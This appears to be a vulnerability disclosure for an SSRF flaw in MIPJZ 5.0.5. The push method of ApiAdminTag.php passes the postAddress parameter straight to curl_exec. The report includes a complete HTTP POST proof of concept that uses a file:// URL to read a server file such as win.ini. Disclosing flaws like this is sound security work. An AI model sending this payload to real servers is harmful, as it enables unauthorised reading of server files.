MIPJZ v5.0.5 has an SSRF that can read server files

[LvZCh]

Vulnerability product: mipjz
Vulnerability version: 5.0.5
Source code link: https://github.com/sansanyun/mipjz/archive/refs/heads/master.zip
Vulnerability details:
In the push method of the mipjz\app\tag\controller\ApiAdminTag.php file, the value of the postAddress parameter that was not processed was directly passed into curl_exec execution and output, resulting in SSRF that can read server files.
Vulnerability location：mipjz\app\tag\controller\ApiAdminTag.php#push method

Vulnerability reproduction:
Background administrator rights
POC:

POST /index.php?s=/tag/ApiAdminTag/push HTTP/1.1
Host: mipjz.com:82
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://mipjz.com:82
Connection: close
Referer: http://mipjz.com:82/index.php?s=/setting/ApiAdminDomainSettings/urlPost
Cookie: PHPSESSID=84a79679dc650a2da1270dfa0aed683d
Upgrade-Insecure-Requests: 1
Priority: u=0, i

postAddress=file:///C:/windows/win.ini&urls=1